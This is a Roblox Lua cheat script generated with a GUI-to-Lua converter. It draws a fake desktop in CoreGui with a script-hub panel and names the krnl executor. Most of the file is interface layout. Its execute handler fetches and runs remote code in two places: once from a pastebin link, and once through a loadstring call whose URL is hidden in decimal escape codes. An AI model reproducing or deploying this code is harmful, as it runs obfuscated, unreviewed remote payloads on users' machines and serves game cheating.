-- Gui to Lua
-- Version: 3.2

-- Instances:

local computer = Instance.new("ScreenGui")
local main = Instance.new("Frame")
local cromemain = Instance.new("ImageButton")
local robloxmain = Instance.new("ImageButton")
local funnithngmain = Instance.new("ImageButton")
local background = Instance.new("ImageLabel")
local ingame = Instance.new("Frame")
local gamelable = Instance.new("ImageLabel")
local minbut = Instance.new("ImageButton")
local bottombar = Instance.new("Frame")
local windows = Instance.new("ImageButton")
local ImageButton = Instance.new("ImageButton")
local robloxbut = Instance.new("ImageButton")
local funnithingbut = Instance.new("ImageButton")
local windows_2 = Instance.new("Frame")
local line = Instance.new("Frame")
local howtousee = Instance.new("TextLabel")
local imfo2 = Instance.new("TextLabel")
local imfo1 = Instance.new("TextLabel")
local info3 = Instance.new("TextLabel")
local funnithing = Instance.new("Frame")
local top = Instance.new("ImageLabel")
local deerihub = Instance.new("TextButton")
local admin = Instance.new("TextButton")
local script1 = Instance.new("TextButton")
local script2 = Instance.new("TextButton")
local script3 = Instance.new("TextButton")
local command = Instance.new("TextBox")
local enject = Instance.new("TextButton")
local executed = Instance.new("TextButton")
local scroll = Instance.new("ScrollingFrame")

--Properties:

computer.Name = "computer"
computer.Parent = game.CoreGui
computer.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

main.Name = "main"
main.Parent = computer
main.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
main.Position = UDim2.new(-0.000334453594, 0, -0.0192719493, 0)
main.Size = UDim2.new(0, 1920, 0, 997)

cromemain.Name = "crome main"
cromemain.Parent = main
cromemain.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
cromemain.BorderColor3 = Color3.fromRGB(27, 42, 53)
cromemain.BorderSizePixel = 0
cromemain.Position = UDim2.new(0.0253699794, 0, 0.00702106301, 0)
cromemain.Size = UDim2.new(0, 91, 0, 100)
cromemain.ZIndex = 2
cromemain.Image = "rbxassetid://7131713053"

robloxmain.Name = "roblox main"
robloxmain.Parent = main
robloxmain.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
robloxmain.BorderColor3 = Color3.fromRGB(27, 42, 53)
robloxmain.BorderSizePixel = 0
robloxmain.LayoutOrder = 1
robloxmain.Position = UDim2.new(0.0253699794, 0, 0.116349049, 0)
robloxmain.Size = UDim2.new(0, 91, 0, 100)
robloxmain.ZIndex = 6
robloxmain.Image = "rbxassetid://7131723641"

funnithngmain.Name = "funni thng main"
funnithngmain.Parent = main
funnithngmain.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
funnithngmain.BorderColor3 = Color3.fromRGB(27, 42, 53)
funnithngmain.BorderSizePixel = 0
funnithngmain.LayoutOrder = 1
funnithngmain.Position = UDim2.new(0.0253699794, 0, 0.20962888, 0)
funnithngmain.Size = UDim2.new(0, 91, 0, 100)
funnithngmain.ZIndex = 8
funnithngmain.Image = "rbxassetid://7130913658"

background.Name = "background?"
background.Parent = main
background.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
background.LayoutOrder = 4
background.Position = UDim2.new(-0.0859375, 0, -0.0250180475, 0)
background.Size = UDim2.new(0, 1920, 0, 1013)
background.Image = "rbxassetid://7130797563"

ingame.Name = "ingame"
ingame.Parent = computer
ingame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ingame.BackgroundTransparency = 1.000
ingame.Size = UDim2.new(0, 267, 0, 100)

gamelable.Name = "game lable"
gamelable.Parent = ingame
gamelable.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
gamelable.BorderSizePixel = 0
gamelable.Position = UDim2.new(0, 0, -0.430000007, 0)
gamelable.Size = UDim2.new(0, 1380, 0, 26)
gamelable.Image = "rbxassetid://7130951368"

minbut.Name = "minbut"
minbut.Parent = ingame
minbut.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
minbut.BorderSizePixel = 0
minbut.Position = UDim2.new(5.14232206, 0, -0.370000005, 0)
minbut.Size = UDim2.new(0, 37, 0, 26)
minbut.Image = "rbxassetid://7130958193"

bottombar.Name = "bottom bar"
bottombar.Parent = computer
bottombar.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
bottombar.BackgroundTransparency = 0.700
bottombar.Position = UDim2.new(-0.000327523536, 0, 0.965594769, 0)
bottombar.Size = UDim2.new(0, 1919, 0, 32)

windows.Name = "windows"
windows.Parent = bottombar
windows.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
windows.Size = UDim2.new(0, 42, 0, 32)
windows.Image = "rbxassetid://7130863389"

ImageButton.Parent = bottombar
ImageButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ImageButton.Position = UDim2.new(0.0565345213, 0, 0, 0)
ImageButton.Size = UDim2.new(0, 39, 0, 32)
ImageButton.Image = "rbxassetid://7130869507"

robloxbut.Name = "roblox but"
robloxbut.Parent = bottombar
robloxbut.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
robloxbut.Position = UDim2.new(0.0991189554, 0, 0, 0)
robloxbut.Size = UDim2.new(0, 39, 0, 32)
robloxbut.Image = "rbxassetid://7130911598"

funnithingbut.Name = "funni thing but"
funnithingbut.Parent = bottombar
funnithingbut.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
funnithingbut.Position = UDim2.new(0.146842897, 0, 0, 0)
funnithingbut.Size = UDim2.new(0, 39, 0, 32)
funnithingbut.Image = "rbxassetid://7130913658"

windows_2.Name = "windows"
windows_2.Parent = computer
windows_2.BackgroundColor3 = Color3.fromRGB(61, 61, 61)
windows_2.BackgroundTransparency = 0.150
windows_2.BorderColor3 = Color3.fromRGB(27, 42, 53)
windows_2.Position = UDim2.new(0, 0, 0.366167039, 0)
windows_2.Size = UDim2.new(0, 787, 0, 532)
windows_2.Visible = false

line.Name = "line"
line.Parent = windows_2
line.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
line.BackgroundTransparency = 0.150
line.Position = UDim2.new(0.302414238, 0, 0, 0)
line.Size = UDim2.new(0, 7, 0, 532)

howtousee.Name = "how to usee"
howtousee.Parent = windows_2
howtousee.BackgroundColor3 = Color3.fromRGB(61, 61, 61)
howtousee.BackgroundTransparency = 0.500
howtousee.BorderColor3 = Color3.fromRGB(27, 42, 53)
howtousee.BorderSizePixel = 0
howtousee.Position = UDim2.new(0.412960619, 0, 0, 0)
howtousee.Size = UDim2.new(0, 388, 0, 50)
howtousee.Font = Enum.Font.SourceSans
howtousee.Text = "how to use"
howtousee.TextColor3 = Color3.fromRGB(0, 0, 0)
howtousee.TextScaled = true
howtousee.TextSize = 14.000
howtousee.TextWrapped = true

imfo2.Name = "imfo 2"
imfo2.Parent = windows_2
imfo2.BackgroundColor3 = Color3.fromRGB(61, 61, 61)
imfo2.Position = UDim2.new(0.311308771, 0, 0.137218043, 0)
imfo2.Size = UDim2.new(0, 542, 0, 50)
imfo2.Font = Enum.Font.SourceSans
imfo2.Text = "krnl is the executor"
imfo2.TextColor3 = Color3.fromRGB(0, 0, 0)
imfo2.TextScaled = true
imfo2.TextSize = 14.000
imfo2.TextWrapped = true

imfo1.Name = "imfo 1"
imfo1.Parent = windows_2
imfo1.BackgroundColor3 = Color3.fromRGB(61, 61, 61)
imfo1.Position = UDim2.new(0.311308771, 0, 0.343984962, 0)
imfo1.Size = UDim2.new(0, 542, 0, 50)
imfo1.Font = Enum.Font.SourceSans
imfo1.Text = "tap the icon to open and close"
imfo1.TextColor3 = Color3.fromRGB(0, 0, 0)
imfo1.TextScaled = true
imfo1.TextSize = 14.000
imfo1.TextWrapped = true

info3.Name = "info 3"
info3.Parent = windows_2
info3.BackgroundColor3 = Color3.fromRGB(61, 61, 61)
info3.Position = UDim2.new(0.311308771, 0, 0.624060154, 0)
info3.Size = UDim2.new(0, 542, 0, 50)
info3.Font = Enum.Font.SourceSans
info3.TextColor3 = Color3.fromRGB(0, 0, 0)
info3.TextScaled = true
info3.TextSize = 14.000
info3.TextWrapped = true

funnithing.Name = "funni thing"
funnithing.Parent = computer
funnithing.BackgroundColor3 = Color3.fromRGB(75, 75, 75)
funnithing.Position = UDim2.new(0.262848765, 0, 0.319057822, 0)
funnithing.Size = UDim2.new(0, 742, 0, 416)
funnithing.Visible = false

top.Name = "top"
top.Parent = funnithing
top.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
top.Size = UDim2.new(0, 742, 0, 31)
top.Image = "rbxassetid://7131192106"

deerihub.Name = "deeri hub"
deerihub.Parent = funnithing
deerihub.BackgroundColor3 = Color3.fromRGB(132, 132, 132)
deerihub.Position = UDim2.new(0, 0, 0.0745192319, 0)
deerihub.Size = UDim2.new(0, 120, 0, 19)
deerihub.Font = Enum.Font.SourceSans
deerihub.Text = "Deeri hub"
deerihub.TextColor3 = Color3.fromRGB(0, 0, 0)
deerihub.TextSize = 14.000

admin.Name = "admin"
admin.Parent = funnithing
admin.BackgroundColor3 = Color3.fromRGB(132, 132, 132)
admin.Position = UDim2.new(0.196765497, 0, 0.0745192319, 0)
admin.Size = UDim2.new(0, 120, 0, 19)
admin.Font = Enum.Font.SourceSans
admin.Text = "Admin"
admin.TextColor3 = Color3.fromRGB(0, 0, 0)
admin.TextSize = 14.000

script1.Name = "script1"
script1.Parent = funnithing
script1.BackgroundColor3 = Color3.fromRGB(132, 132, 132)
script1.Position = UDim2.new(0.407008082, 0, 0.0745192319, 0)
script1.Size = UDim2.new(0, 120, 0, 19)
script1.Font = Enum.Font.SourceSans
script1.TextColor3 = Color3.fromRGB(0, 0, 0)
script1.TextSize = 14.000

script2.Name = "script 2"
script2.Parent = funnithing
script2.BackgroundColor3 = Color3.fromRGB(132, 132, 132)
script2.Position = UDim2.new(0.623989224, 0, 0.0745192319, 0)
script2.Size = UDim2.new(0, 120, 0, 19)
script2.Font = Enum.Font.SourceSans
script2.TextColor3 = Color3.fromRGB(0, 0, 0)
script2.TextSize = 14.000

script3.Name = "script 3"
script3.Parent = funnithing
script3.BackgroundColor3 = Color3.fromRGB(132, 132, 132)
script3.Position = UDim2.new(0.819406986, 0, 0.0745192319, 0)
script3.Size = UDim2.new(0, 120, 0, 19)
script3.Font = Enum.Font.SourceSans
script3.TextColor3 = Color3.fromRGB(0, 0, 0)
script3.TextSize = 14.000

command.Name = "command"
command.Parent = funnithing
command.BackgroundColor3 = Color3.fromRGB(190, 190, 190)
command.Position = UDim2.new(0, 0, 0.21634616, 0)
command.Size = UDim2.new(0, 598, 0, 294)
command.ClearTextOnFocus = false
command.Font = Enum.Font.SourceSans
command.Text = ""
command.TextColor3 = Color3.fromRGB(0, 0, 0)
command.TextScaled = true
command.TextSize = 14.000
command.TextWrapped = true

enject.Name = "enject"
enject.Parent = funnithing
enject.BackgroundColor3 = Color3.fromRGB(132, 132, 132)
enject.Position = UDim2.new(0.7304582, 0, 0.923076928, 0)
enject.Size = UDim2.new(0, 200, 0, 32)
enject.Font = Enum.Font.SourceSans
enject.Text = "enjected"
enject.TextColor3 = Color3.fromRGB(0, 0, 0)
enject.TextScaled = true
enject.TextSize = 14.000
enject.TextWrapped = true

executed.Name = "executed"
executed.Parent = funnithing
executed.BackgroundColor3 = Color3.fromRGB(132, 132, 132)
executed.Position = UDim2.new(0, 0, 0.923076928, 0)
executed.Size = UDim2.new(0, 200, 0, 32)
executed.Font = Enum.Font.SourceSans
executed.Text = "execute"
executed.TextColor3 = Color3.fromRGB(0, 0, 0)
executed.TextScaled = true
executed.TextSize = 14.000
executed.TextWrapped = true

scroll.Name = "scroll"
scroll.Parent = funnithing
scroll.Active = true
scroll.BackgroundColor3 = Color3.fromRGB(190, 190, 190)
scroll.Position = UDim2.new(0.805929899, 0, 0.21634616, 0)
scroll.Size = UDim2.new(0, 144, 0, 294)
scroll.VerticalScrollBarInset = Enum.ScrollBarInset.ScrollBar

-- Scripts:

local function ALVGB_fake_script() -- robloxmain.open roblox 
	local script = Instance.new('LocalScript', robloxmain)

	local roblox = 0
	
	script.Parent.MouseButton1Click:Connect(function()
		if roblox == 0 then
			script.Parent.Parent.Parent.main.Visible = false
			script.Parent.Parent.Parent.ingame.Visible = true
			roblox = 1
		elseif roblox == 1 then
			script.Parent.Parent.Parent.main.Visible = true
			script.Parent.Parent.Parent.ingame.Visible = false
			roblox = 0
		end
	
	
	end)
end
coroutine.wrap(ALVGB_fake_script)()
local function ZFNST_fake_script() -- funnithngmain.open funni 
	local script = Instance.new('LocalScript', funnithngmain)

	local roblox = 0
	
	script.Parent.MouseButton1Click:Connect(function()
		if roblox == 0 then
			script.Parent.Parent.Parent["funni thing"].Visible = true
			roblox = 1
		elseif roblox == 1 then
			script.Parent.Parent.Parent["funni thing"].Visible = false
			roblox = 0
		end
	
	
	end)
end
coroutine.wrap(ZFNST_fake_script)()
local function JONNEL_fake_script() -- windows.open windows 
	local script = Instance.new('LocalScript', windows)

	local roblox = 0
	
	script.Parent.MouseButton1Click:Connect(function()
		if roblox == 0 then
			script.Parent.Parent.Parent.windows.Visible = true
			roblox = 1
		elseif roblox == 1 then
			script.Parent.Parent.Parent.windows.Visible = false
			roblox = 0
		end
	
	
	end)
end
coroutine.wrap(JONNEL_fake_script)()
local function BLVRF_fake_script() -- robloxbut.open roblox 
	local script = Instance.new('LocalScript', robloxbut)

	local roblox = 0
	
	script.Parent.MouseButton1Click:Connect(function()
		if roblox == 0 then
		script.Parent.Parent.Parent.main.Visible = false
			script.Parent.Parent.Parent.ingame.Visible = true
			 roblox = 1
		elseif roblox == 1 then
			script.Parent.Parent.Parent.main.Visible = true
			script.Parent.Parent.Parent.ingame.Visible = false
			 roblox = 0
		end
			
		
	end)
end
coroutine.wrap(BLVRF_fake_script)()
local function KSHJQ_fake_script() -- funnithingbut.open funni thing uh 
	local script = Instance.new('LocalScript', funnithingbut)

	local roblox = 0
	
	script.Parent.MouseButton1Click:Connect(function()
		if roblox == 0 then
			script.Parent.Parent.Parent["funni thing"].Visible = true
			roblox = 1
		elseif roblox == 1 then
			script.Parent.Parent.Parent["funni thing"].Visible = false
			roblox = 0
		end
	
	
	end)
end
coroutine.wrap(KSHJQ_fake_script)()
local function IFXMJPV_fake_script() -- deerihub.deeri hub text 
	local script = Instance.new('LocalScript', deerihub)

	local textmode = "none"
	
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.command.Text = "Deeri Hub"
			textmode = "Deeri hub"
	end)
	
end
coroutine.wrap(IFXMJPV_fake_script)()
local function FYVAJU_fake_script() -- admin.admin hub text 
	local script = Instance.new('LocalScript', admin)

	local textmode = "none"
	
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.command.Text = "admin"
		textmode = "admin"
	end)
	
	
	
end
coroutine.wrap(FYVAJU_fake_script)()
local function DMVI_fake_script() -- executed.execute script 
	local script = Instance.new('LocalScript', executed)

	
	
	
	
	script.Parent.MouseButton1Click:Connect(function()
		if script.Parent.Parent.command.Text == "Deeri Hub" then
			loadstring('\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\34\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\68\101\101\114\105\49\47\105\110\101\47\109\97\105\110\47\100\101\101\114\105\37\50\48\104\117\98\37\50\48\108\111\97\100\37\50\48\49\34\41\41\40\41')()
		end
	end)
	
	
	
	script.Parent.MouseButton1Click:Connect(function()
		if script.Parent.Parent.command.Text == "admin" then
			loadstring(game:HttpGetAsync("https://pastebin.com/raw/qsM4xDCX"))()
		end
	end)
	
	
	
	
	
	
	
end
coroutine.wrap(DMVI_fake_script)()
local function IZFT_fake_script() -- funnithing.dragable 
	local script = Instance.new('LocalScript', funnithing)

	local main  = script.Parent.Parent["funni thing"]
	
	main.Active = true
	main.Draggable = true
end
coroutine.wrap(IZFT_fake_script)()
